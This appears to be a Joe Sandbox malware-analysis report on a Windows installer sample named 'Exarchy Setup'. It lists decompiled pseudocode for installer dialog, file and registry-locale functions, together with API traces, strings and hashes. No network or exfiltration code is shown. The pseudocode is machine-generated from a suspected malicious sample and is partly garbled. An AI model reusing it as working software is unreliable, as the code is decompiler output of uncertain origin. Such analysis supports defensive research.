Opcode ID: 7d90432cc7f49f8ab5bcc96c233d37ec031ee43d41d9f9aefc98a9dce06193df
Instruction ID: 4bc6dad9f5a1b896ceeba6da016392521ba5d08b52bec72aeafbcc7940a5a293
Opcode Fuzzy Hash: 7d90432cc7f49f8ab5bcc96c233d37ec031ee43d41d9f9aefc98a9dce06193df
Instruction Fuzzy Hash: 32F18670D04269CBDF28CFA8C8946ADBBB1FF44305F25816EC856BB281D7785A96CF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406091 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406091(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x421558); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x421558;
			}

0x0040609c
0x004060a5
0x00000000
0x004060b2
0x004060a8
0x00000000

APIs

FindFirstFileA.KERNELBASE(75C43410,00421558,C:\Users\user\AppData\Local\Temp\nssF823.tmp,00405930,C:\Users\user\AppData\Local\Temp\nssF823.tmp,C:\Users\user\AppData\Local\Temp\nssF823.tmp,00000000,C:\Users\user\AppData\Local\Temp\nssF823.tmp,C:\Users\user\AppData\Local\Temp\nssF823.tmp,75C43410,?,C:\Users\user\AppData\Local\Temp\,0040564F,?,75C43410,C:\Users\user\AppData\Local\Temp\), ref: 0040609C
FindClose.KERNEL32(00000000), ref: 004060A8

Strings

C:\Users\user\AppData\Local\Temp\nssF823.tmp, xrefs: 00406091

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\Users\user\AppData\Local\Temp\nssF823.tmp
API String ID: 2295610775-1755549536
Opcode ID: fb61142ecab510d9bb051178c92cda44e9a3fae507c1338c77e1024ce068b834
Instruction ID: 813a8b491940df02531a3acdfdb3b2737b98bd5f9f42a53c134914e20d5c8ee8
Opcode Fuzzy Hash: fb61142ecab510d9bb051178c92cda44e9a3fae507c1338c77e1024ce068b834
Instruction Fuzzy Hash: 16D012319490206BC31167386C0C85B7A5C9F55331751CA33F567F13F0C7388DA286EA

Uniqueness

Uniqueness Score: -1.00%

Function 00403A9F Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00403A9F(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t142;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x41fcf0 = _t35;
					if(_t115 == 0x110) {
						 *0x423708 = _t125;
						 *0x41fd04 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push("true");
						 *0x41ecd0 = _t91;
						E00403F72(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x422ee8);
						 *0x422ecc = E0040140B("true");
						_t35 = 1;
						__eflags = 1;
						 *0x41fcf0 = 1;
					}
					_t122 =  *0x4091dc; // 0x0
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x423720;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403FBE(0x40b);
						while(1) {
							_t37 =  *0x41fcf0; // 0x1
							 *0x4091dc =  *0x4091dc + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091dc; // 0x0
							__eflags = _t39 -  *0x423724;
							if(_t39 ==  *0x423724) {
								E0040140B(1);
							}
							__eflags =  *0x422ecc - _t133; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x4091dc -  *0x423724; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405DAF(_t116, _t125, _t130, 0x42b800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403F72(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403F72(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403F72(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x42378c - _t133;
							_v32 = _t49;
							if( *0x42378c != _t133) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008); // executed
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100); // executed
							E00403F94(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x41ecd0, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), "true", _t133, 1);
							__eflags =  *0x42378c - _t133;
							if( *0x42378c == _t133) {
								_push( *0x41fd04);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x41ecd0);
							}
							E00403FA7();
							E00405D8D(0x41fd08, 0x422f00);
							E00405DAF(0x41fd08, _t125, _t130,  &(0x41fd08[lstrlenA(0x41fd08)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x41fd08); // executed
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x422ed8); // executed
									 *0x41f4e0 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x423700,  *_t130 +  *0x422ee0 & 0x0000ffff, _t125,  *(0x4091e0 +  *(_t130 + 4) * 4), _t130); // executed
									__eflags = _t73 - _t133;
									 *0x422ed8 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403F72(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x422ed8, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x422ecc - _t133; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x422ed8, "true"); // executed
									E00403FBE(0x405);
									goto L58;
								}
								__eflags =  *0x42378c - _t133;
								if( *0x42378c != _t133) {
									goto L61;
								}
								__eflags =  *0x423780 - _t133;
								if( *0x423780 != _t133) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x422ed8);
						 *0x423708 = _t133;
						EndDialog(_t125,  *0x41f0d8);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x422ed8, 0x40f, 0, 1);
						__eflags =  *0x422ecc - _t133; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x41fce8, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x41fce8,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403FD9(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x422ed8, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42378c - _t133;
										if( *0x42378c == _t133) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x41f0d8 = 1;
											L21:
											_push("true");
											L22:
											E00403F4B();
											goto L26;
										}
										E0040140B(_t127);
										 *0x41f0d8 = _t127;
										goto L21;
									}
									__eflags =  *0x4091dc - _t133; // 0x0
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x422ed8);
						 *0x422ed8 = _a12;
						L58:
						if( *0x420d08 == _t133) {
							_t142 =  *0x422ed8 - _t133; // 0x1042e
							if(_t142 != 0) {
								ShowWindow(_t125, 0xa); // executed
								 *0x420d08 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}

0x00403aa8
0x00403ab1
0x00403bf2
0x00403bf6
0x00403bfa
0x00403bfc
0x00403c01
0x00403c0c
0x00403c17
0x00403c1c
0x00403c1e
0x00403c20
0x00403c23
0x00403c28
0x00403c36
0x00403c43
0x00403c4a
0x00403c4a
0x00403c4b
0x00403c4b
0x00403c50
0x00403c56
0x00403c5d
0x00403c63
0x00403c65
0x00403ca5
0x00403caa
0x00403caf
0x00403caf
0x00403cb4
0x00403cbd
0x00403cbf
0x00403cc4
0x00403cca
0x00403cce
0x00403cce
0x00403cd3
0x00403cd9
0x00000000
0x00000000
0x00403ce4
0x00403cea
0x00000000
0x00000000
0x00403cf3
0x00403cfb
0x00403d00
0x00403d03
0x00403d09
0x00403d0e
0x00403d11
0x00403d17
0x00403d1c
0x00403d1f
0x00403d25
0x00403d2d
0x00403d33
0x00403d39
0x00403d3d
0x00403d44
0x00403d44
0x00403d44
0x00403d4e
0x00403d60
0x00403d6c
0x00403d71
0x00403d7b
0x00403d81
0x00403d83
0x00403d88
0x00403d85
0x00403d85
0x00403d85
0x00403d98
0x00403db0
0x00403db2
0x00403db8
0x00403dcd
0x00403dba
0x00403dc3
0x00403dc5
0x00403dc5
0x00403dd3
0x00403de3
0x00403df4
0x00403dfb
0x00403e01
0x00403e05
0x00403e0a
0x00403e0c
0x00000000
0x00403e12
0x00403e12
0x00403e14
0x00000000
0x00000000
0x00403e1a
0x00403e1e
0x00403e43
0x00403e49
0x00403e4f
0x00403e51
0x00000000
0x00000000
0x00403e77
0x00403e7d
0x00403e7f
0x00403e84
0x00000000
0x00000000
0x00403e8a
0x00403e8d
0x00403e90
0x00403ea7
0x00403eb3
0x00403ecc
0x00403ed2
0x00403ed6
0x00403edb
0x00403ee1
0x00000000
0x00000000
0x00403eeb
0x00403ef6
0x00000000
0x00403ef6
0x00403e20
0x00403e26
0x00000000
0x00000000
0x00403e2c
0x00403e32
0x00000000
0x00000000
0x00000000
0x00403e38
0x00403e0c
0x00403f03
0x00403f0f
0x00403f16
0x00000000
0x00403c67
0x00403c67
0x00403c6a
0x00403c9d
0x00403c9d
0x00403c9f
0x00000000
0x00000000
0x00000000
0x00403c9f
0x00403c6c
0x00403c70
0x00403c75
0x00403c77
0x00000000
0x00000000
0x00403c87
0x00403c8f
0x00000000
0x00403c95
0x00403ac3
0x00403ac3
0x00403ac7
0x00403acc
0x00403adb
0x00403adb
0x00403ae4
0x00403aed
0x00403af8
0x00403af8
0x00403b04
0x00403b20
0x00403b23
0x00403b36
0x00403b3c
0x00403bdf
0x00000000
0x00403be8
0x00403b42
0x00403b4f
0x00403b51
0x00403b53
0x00403b72
0x00403b72
0x00403b75
0x00403b7a
0x00403b7d
0x00403b8d
0x00403b8e
0x00403b90
0x00403bc6
0x00403bd9
0x00000000
0x00403bd9
0x00403b92
0x00403b98
0x00403bb1
0x00403bb6
0x00403bb8
0x00000000
0x00000000
0x00403bba
0x00403ba6
0x00403ba6
0x00403ba8
0x00403ba8
0x00000000
0x00403ba8
0x00403b9b
0x00403ba0
0x00000000
0x00403ba0
0x00403b7f
0x00403b85
0x00000000
0x00000000
0x00403b87
0x00000000
0x00403b87
0x00403b77
0x00000000
0x00403b77
0x00403b5d
0x00403b64
0x00403b6a
0x00403b6c
0x00000000
0x00000000
0x00000000
0x00403b6c
0x00403b28
0x00000000
0x00403b06
0x00403b0c
0x00403b16
0x00403f1c
0x00403f22
0x00403f24
0x00403f2a
0x00403f2f
0x00403f35
0x00403f35
0x00403f2a
0x00403f3f
0x00000000
0x00403f3f
0x00403b04

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403ADB
ShowWindow.USER32(?), ref: 00403AF8
DestroyWindow.USER32 ref: 00403B0C
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403B28
GetDlgItem.USER32(?,?), ref: 00403B49
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403B5D
IsWindowEnabled.USER32(00000000), ref: 00403B64
GetDlgItem.USER32(?,00000001), ref: 00403C12
GetDlgItem.USER32(?,00000002), ref: 00403C1C
SetClassLongA.USER32(?,000000F2,?), ref: 00403C36
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403C87
GetDlgItem.USER32(?,00000003), ref: 00403D2D
ShowWindow.USER32(00000000,?), ref: 00403D4E
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403D60
EnableWindow.USER32(?,?), ref: 00403D7B
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403D91
EnableMenuItem.USER32(00000000), ref: 00403D98
SendMessageA.USER32(?,?,00000000,00000001), ref: 00403DB0
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403DC3
lstrlenA.KERNEL32(Exarchy Setup: Installing,?,Exarchy Setup: Installing,00422F00), ref: 00403DEC
SetWindowTextA.USER32(?,Exarchy Setup: Installing), ref: 00403DFB
ShowWindow.USER32(?,0000000A), ref: 00403F2F

Strings

Exarchy Setup: Installing, xrefs: 00403DD8, 00403DE2, 00403DEB, 00403DF9

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: Exarchy Setup: Installing
API String ID: 3282139019-1182559719
Opcode ID: ec8e7f45b731f1c503051a0268587446319fe4fbdfb454f114b83108c9e54f46
Instruction ID: e9d49dc60b417063a6d48fe73637f5ca0c7f50776824624c4fc99b5b3569cad9
Opcode Fuzzy Hash: ec8e7f45b731f1c503051a0268587446319fe4fbdfb454f114b83108c9e54f46
Instruction Fuzzy Hash: FBC1BF71A04205BBDB21AF61ED49E2B3E7DFB4470AB40453EF501B11E1C779A942AB2E

Uniqueness

Uniqueness Score: -1.00%

Function 0040370D Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E0040370D(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t17;
				void* _t25;
				void* _t27;
				int _t28;
				void* _t31;
				int _t34;
				int _t35;
				intOrPtr _t36;
				int _t39;
				char _t57;
				CHAR* _t59;
				signed char _t63;
				CHAR* _t74;
				intOrPtr _t76;
				CHAR* _t81;

				_t76 =  *0x423710;
				_t17 = E00406126(2);
				_t84 = _t17;
				if(_t17 == 0) {
					_t74 = 0x41fd08;
					"1033" = 0x30;
					 *0x42a001 = 0x78;
					 *0x42a002 = 0;
					E00405C74("true", "Control Panel\\Desktop\\ResourceLocale", 0, 0x41fd08, 0);
					__eflags =  *0x41fd08; // 0x45
					if(__eflags == 0) {
						E00405C74(0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040735A, 0x41fd08, 0);
					}
					lstrcatA("1033", _t74);
				} else {
					E00405CEB("1033",  *_t17() & 0x0000ffff);
				}
				E004039D2(_t71, _t84);
				_t80 = "C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Strygende\\ridered\\Aftest";
				 *0x423780 =  *0x423718 & 0x00000020;
				 *0x42379c = 0x10000;
				if(E004058ED(_t84, "C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Strygende\\ridered\\Aftest") != 0) {
					L16:
					if(E004058ED(_t92, _t80) == 0) {
						E00405DAF(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118))); // executed
					}
					_t25 = LoadImageA( *0x423700, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x422ee8 = _t25;
					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t27 = E004039D2(_t71, __eflags);
							__eflags =  *0x4237a0;
							if( *0x4237a0 != 0) {
								_t28 = E00405078(_t27, 0);
								__eflags = _t28;
								if(_t28 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x422ecc; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x41fce8, 5); // executed
							_t34 = E004060B8("RichEd20"); // executed
							__eflags = _t34;
							if(_t34 == 0) {
								E004060B8("RichEd32");
							}
							_t81 = "RichEdit20A";
							_t35 = GetClassInfoA(0, _t81, 0x422ea0);
							__eflags = _t35;
							if(_t35 == 0) {
								GetClassInfoA(0, "RichEdit", 0x422ea0);
								 *0x422ec4 = _t81;
								RegisterClassA(0x422ea0);
							}
							_t36 =  *0x422ee0; // 0x0
							_t39 = DialogBoxParamA( *0x423700, _t36 + 0x00000069 & 0x0000ffff, 0, E00403A9F, 0); // executed
							E0040365D(E0040140B(5), 1);
							return _t39;
						}
						L22:
						_t31 = 2;
						return _t31;
					} else {
						_t71 =  *0x423700;
						 *0x422ea4 = E00401000;
						 *0x422eb0 =  *0x423700;
						 *0x422eb4 = _t25;
						 *0x422ec4 = 0x4091f4;
						if(RegisterClassA(0x422ea0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoA("true", 0,  &_v16, 0);
						 *0x41fce8 = CreateWindowExA("true", 0x4091f4, 0, "true", _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423700, 0);
						goto L21;
					}
				} else {
					_t71 =  *(_t76 + 0x48);
					if(_t71 == 0) {
						goto L16;
					}
					_t74 = 0x4226a0;
					E00405C74( *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x423738, 0x4226a0, 0);
					_t57 =  *0x4226a0; // 0x43
					if(_t57 == 0) {
						goto L16;
					}
					if(_t57 == 0x22) {
						_t74 = 0x4226a1;
						 *((char*)(E0040582A(0x4226a1, 0x22))) = 0;
					}
					_t59 = lstrlenA(_t74) + _t74 - 4;
					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
						L15:
						E00405D8D(_t80, E004057FF(_t74));
						goto L16;
					} else {
						_t63 = GetFileAttributesA(_t74);
						if(_t63 == 0xffffffff) {
							L14:
							E00405846(_t74);
							goto L15;
						}
						_t92 = _t63 & 0x00000010;
						if((_t63 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00403713
0x0040371c
0x00403723
0x00403725
0x00403739
0x0040374b
0x00403752
0x00403759
0x0040375f
0x00403764
0x0040376a
0x0040377d
0x0040377d
0x00403788
0x00403727
0x00403732
0x00403732
0x0040378d
0x00403797
0x004037a0
0x004037a5
0x004037b6
0x0040383d
0x00403845
0x0040384e
0x0040384e
0x00403864
0x0040386a
0x00403878
0x004038f9
0x00403901
0x0040390b
0x00403910
0x00403916
0x004039a0
0x004039a5
0x004039a7
0x004039c3
0x00000000
0x004039c3
0x004039a9
0x004039af
0x004039b7
0x004039b7
0x00000000
0x004039af
0x00403924
0x0040392f
0x00403934
0x00403936
0x0040393d
0x0040393d
0x00403948
0x00403950
0x00403952
0x00403954
0x0040395d
0x00403960
0x00403966
0x00403966
0x0040396c
0x00403985
0x00403996
0x00000000
0x0040399b
0x00403903
0x00403905
0x00000000
0x0040387a
0x0040387a
0x00403886
0x00403890
0x00403896
0x0040389b
0x004038aa
0x004039c8
0x004039c8
0x00000000
0x004039c8
0x004038b9
0x004038f4
0x00000000
0x004038f4
0x004037bc
0x004037bc
0x004037c1
0x00000000
0x00000000
0x004037cb
0x004037db
0x004037e0
0x004037e7
0x00000000
0x00000000
0x004037eb
0x004037ed
0x004037fa
0x004037fa
0x00403802
0x00403808
0x00403830
0x00403838
0x00000000
0x0040381a
0x0040381b
0x00403824
0x0040382a
0x0040382b
0x00000000
0x0040382b
0x00403826
0x00403828
0x00000000
0x00000000
0x00000000
0x00403828
0x00403808

APIs

Part of subcall function 00406126: GetModuleHandleA.KERNEL32(?,?,?,004031D7,00000009), ref: 00406138
Part of subcall function 00406126: GetProcAddress.KERNEL32(00000000,?), ref: 00406153

lstrcatA.KERNEL32(1033,Exarchy Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Exarchy Setup: Installing,00000000,00000002,75C43410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\wLlREXsA9M.exe",00000000), ref: 00403788
lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Strygende\ridered\Aftest,1033,Exarchy Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Exarchy Setup: Installing,00000000,00000002,75C43410), ref: 004037FD
lstrcmpiA.KERNEL32(?,.exe), ref: 00403810
GetFileAttributesA.KERNEL32(Call), ref: 0040381B
LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Strygende\ridered\Aftest), ref: 00403864

Part of subcall function 00405CEB: wsprintfA.USER32 ref: 00405CF8

RegisterClassA.USER32(00422EA0), ref: 004038A1
SystemParametersInfoA.USER32(?,00000000,?,00000000), ref: 004038B9
CreateWindowExA.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004038EE
ShowWindow.USER32(00000005,00000000), ref: 00403924
GetClassInfoA.USER32(00000000,RichEdit20A,00422EA0), ref: 00403950
GetClassInfoA.USER32(00000000,RichEdit,00422EA0), ref: 0040395D
RegisterClassA.USER32(00422EA0), ref: 00403966
DialogBoxParamA.USER32(?,00000000,00403A9F,00000000), ref: 00403985

Strings

RichEd32, xrefs: 00403938
RichEd20, xrefs: 0040392A
"C:\Users\user\Desktop\wLlREXsA9M.exe", xrefs: 00403711
.exe, xrefs: 0040380A
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Strygende\ridered\Aftest, xrefs: 00403797, 0040379F, 00403837, 0040383D, 0040384D
Call, xrefs: 004037CB, 004037D3, 004037E0, 0040382A, 00403830
.DEFAULT\Control Panel\International, xrefs: 00403773
RichEdit, xrefs: 00403957
_Nb, xrefs: 00403880, 004038E8
C:\Users\user\AppData\Local\Temp\, xrefs: 00403712
Control Panel\Desktop\ResourceLocale, xrefs: 00403741
1033, xrefs: 0040372D, 00403783
RichEdit20A, xrefs: 00403948, 0040394E
Exarchy Setup: Installing, xrefs: 00403739, 0040373F, 00403764, 0040376D, 00403782

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\wLlREXsA9M.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Strygende\ridered\Aftest$Call$Control Panel\Desktop\ResourceLocale$Exarchy Setup: Installing$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 1975747703-2151459580
Opcode ID: 7ddbb788996758d42c6302230f5a34b7a56dfa515d1134890debce1145b4599d
Instruction ID: 2e026a819d4c619071a490ae0ccbf477e06c10488dad9e979ad6a7b1ec6c3732
Opcode Fuzzy Hash: 7ddbb788996758d42c6302230f5a34b7a56dfa515d1134890debce1145b4599d
Instruction Fuzzy Hash: 7461C8B16442047ED720BF659C45F373AACEB4474AF40847FF941B22E2D6BC9D029A2E

Uniqueness

Uniqueness Score: -1.00%

Function 00402CFA Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 78%

			E00402CFA(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\Arthur\\Desktop\\wLlREXsA9M.exe";
				 *0x42370c = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\Arthur\\Desktop\\wLlREXsA9M.exe", 0x400);
				_t89 = E00405A00(_t91, "true", 3);
				_v16 = _t89;
				 *0x409018 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\Arthur\\Desktop";
				E00405D8D("C:\\Users\\Arthur\\Desktop", _t91);
